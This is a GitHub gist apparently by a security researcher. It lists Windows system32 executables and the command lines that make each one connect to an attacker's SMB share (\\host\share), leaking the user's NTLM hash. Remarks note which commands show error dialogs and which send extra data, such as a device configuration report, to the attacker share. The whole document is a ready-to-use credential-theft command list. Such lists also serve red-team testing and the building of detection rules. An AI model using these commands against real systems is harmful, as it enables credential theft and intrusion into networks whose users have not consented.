Created
March 5, 2018 04:24
-
-
Save anonymous/70f792d50078f0ee795d39d0aa0da46e to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Executables for Capturing Hashes (incomplete list) | |
(all file locations are system32 - win10, impacket-smbserver with -smb2support used for testing) | |
@0rbz_ | |
attrib.exe \\host\share | |
bcdboot.exe \\host\share | |
bdeunlock.exe \\host\share | |
cacls.exe \\host\share | |
certreq.exe \\host\share (noisy, pops an error dialog) | |
certutil.exe \\host\share | |
cipher.exe \\host\share | |
ClipUp.exe -l \\host\share | |
cmdl32.exe \\host\share | |
cmstp.exe /s \\host\share | |
colorcpl.exe \\host\share (noisy, pops an error dialog) | |
comp.exe /N=0 \\host\share \\host\share | |
compact.exe \\host\share | |
control.exe \\host\share | |
convertvhd.exe -source \\host\share -destination \\host\share | |
Defrag.exe \\host\share | |
DeployUtil.exe /install \\host\share | |
DevToolsLauncher.exe GetFileListing \\host\share (this one's cool. will return a file listing (json-formatted) from remote SMB share...) | |
diskperf.exe \\host\share | |
dispdiag.exe -out \\host\share | |
doskey.exe /MACROFILE=\\host\share | |
esentutl.exe /k \\host\share | |
expand.exe \\host\share | |
extrac32.exe \\host\share | |
FileHistory.exe \\host\share (noisy, pops a gui) | |
findstr.exe * \\host\share | |
fontview.exe \\host\share (noisy, pops an error dialog) | |
fvenotify.exe \\host\share (noisy, pops an access denied error) | |
FXSCOVER.exe \\host\share (noisy, pops GUI) | |
hwrcomp.exe -check \\host\share | |
hwrreg.exe \\host\share | |
icacls.exe \\host\share | |
LaunchWinApp.exe \\host\share (noisy, will pop an explorer window with the contents of your SMB share.) | |
licensingdiag.exe -cab \\host\share | |
lodctr.exe \\host\share | |
lpksetup.exe /p \\host\share /s | |
makecab.exe \\host\share | |
MdmDiagnosticsTool.exe -out \\host\share (sends hash, and as a *bonus!* writes an MDMDiagReport.html to the attacker share with full CSP configuration.) | |
mshta.exe \\host\share (noisy, pops an HTA window) | |
msiexec.exe /update \\host\share /quiet | |
msinfo32.exe \\host\share (noisy, pops a "cannot open" dialog) | |
mspaint.exe \\host\share (noisy, invalid path to png error) | |
mspaint.exe \\host\share\share.png (will capture hash, and display the remote PNG file to the user) | |
msra.exe /openfile \\host\share (noisy, error) | |
mstsc.exe \\host\share (noisy, error) | |
netcfg.exe -l \\host\share -c p -i foo |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment